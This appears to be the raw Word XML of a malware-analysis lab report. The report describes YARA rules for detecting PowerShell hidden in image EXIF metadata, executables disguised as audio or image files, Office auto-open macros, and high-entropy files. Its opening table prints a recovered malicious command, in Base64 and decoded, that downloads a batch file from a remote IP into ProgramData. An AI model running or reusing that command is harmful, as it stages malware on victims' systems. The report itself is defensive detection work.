              <w:t xml:space="preserve">cmd</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powershell</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invoke-webrequest</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-uri</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'http://108.181.155.31/asefa.bat'</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-outfile</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'c:\programdata\asefa.bat'</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="1853.33056640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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000232">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
                <w:color w:val="188038"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Y21kIC9jIHBvd2Vyc2hlbGwgaW52b2tlLXdlYnJlcXVlc3QgLXVyaSAnaHR0cDovLzEwOC4xODEuMTU1LjMxL2FzZWZhLmJhdCcgLW91dGZpbGUgJ2M6XHByb2dyYW1kYXRhXGFzZWZhLmJhdCcK</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023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Decoded Output:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000234">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
                <w:color w:val="188038"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">cmd</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powershell</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invoke-webrequest</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-uri</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'http://108.181.155.31/asefa.bat'</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-outfile</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'c:\programdata\asefa.bat'</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000235">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_17fo3u74icnf" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXIF_Base64_PowerShell_Command.yara</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000236">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The GitHub entry for this rule can be found </w:t>
      </w:r>
      <w:hyperlink r:id="rId69">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580368" cy="4743758"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="12" name="image2.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image2.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId70"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580368" cy="4743758"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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rule was created to detect malicious PowerShell commands hidden in image EXIF metadata using Base64 encoding. The rule searches for encoded versions of PowerShell execution commands, download functions, and suspicious URLs in the metadata. This rule can target files like frontpage.jpg. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000238">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sz5lqfgbuziy" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000239">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uq84fgks6d32" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PE_Audio_Mismatch.yara</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023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GitHub entry for this rule can be found </w:t>
      </w:r>
      <w:hyperlink r:id="rId71">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B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8ykt0s1gzv12" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3619500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2" name="image6.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image6.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3619500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table18"/>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75"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="9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rule detects PE executable files (.exe, .dll) that contain audio file signatures (WAV, MP3). The rule triggers when a file starts with the PE signature (4D 5A) and also contains WAV or MP3 headers anywhere in the file.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_b3bew978ajfz" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ewcyqdpbur6h" w:id="47"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PE_Image_Mismatch.yara</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The GitHub entry for this rule can be found </w:t>
      </w:r>
      <w:hyperlink r:id="rId73">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40">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_597c04pivr46" w:id="48"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3949700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="11" name="image4.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image4.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3949700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table19"/>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75"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="9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rule detects PE files that contain embedded image file signatures (like JPG, PNG, GIF, or BMP), which could indicate hidden or suspicious image data inside an executable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000242">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_excfcwfk5nzk" w:id="49"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000243">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8k4hkqgf6fvk" w:id="50"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Audio_PE_Embedded..yara</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024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GitHub entry for this rule can be found </w:t>
      </w:r>
      <w:hyperlink r:id="rId75">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168900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6" name="image8.jpg"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image8.jpg"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="5168900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table20"/>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75"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="9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rule detects portable executable (PE) files that are disguised as audio files. The rule does so by examining the hex of WAV and MP3 files for known PE headers. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000247">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nao4noo3myy4" w:id="51"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000248">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3ctn4o2qzsiv" w:id="52"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious_Office_AutoOpen_Macro.yar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024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GitHub entry for this rule can be found </w:t>
      </w:r>
      <w:hyperlink r:id="rId77">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A">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2489200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5" name="image1.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image1.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2489200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="0B5394"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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This rule is designed to detect Microsoft Office documents that contain embedded VBA macros, which are often used as malware delivery mechanisms. This rule targets files like ‘SecurityAdvisory.docm’</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_deoxdwv0u653" w:id="53"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6shy4btf74cq" w:id="54"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HighEntropyAny.yar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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GitHub entry for this rule can be found </w:t>
      </w:r>
      <w:hyperlink r:id="rId79">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F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="4254500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="9" name="image10.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image10.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId80"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="42545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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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75"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="9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rule was created to identify files with high entropy that </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">DO</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> contain .rsrc and .reloc. Given that other tools like ‘browmal’ and ‘pestudio.exe’ detected high entropy in files that weren’t detected by ‘HighEntropy.yar’</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Undetected Files:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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frontpage.jpg - Entropy:7.437</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002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SecurityAdvisory.docm - Entropy:7.412</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257">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sn72zbv71qhi" w:id="55"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000258">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fphnevjo667h" w:id="56"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000259">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7m1niuqzfm2p" w:id="57"/>
      <w:bookmarkEnd w:id="5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A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vzmwg5ljjz23" w:id="58"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fixing the Image and Audio File Detections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025B">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During the analysis of our </w:t>
      </w:r>
      <w:hyperlink r:id="rId81">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">YARA rules</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> designed to identify audio and image file types, several false positives were triggered by the Thug Lyfe campaign files. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
